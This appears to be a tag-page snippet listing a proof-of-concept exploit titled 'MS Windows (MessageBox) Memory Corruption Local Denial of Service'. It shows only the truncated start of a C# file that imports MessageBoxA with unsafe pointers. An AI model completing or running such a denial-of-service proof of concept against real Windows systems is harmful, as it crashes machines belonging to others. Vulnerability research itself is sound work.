标签:pHelloBug
-
MS Windows (MessageBox) Memory Corruption Local Denial of Service”
// mbox.cs using System; using System.Runtime.InteropServices; class HelloWorldFromMicrosoft { [DllImport("user32.dll")] unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uTyp...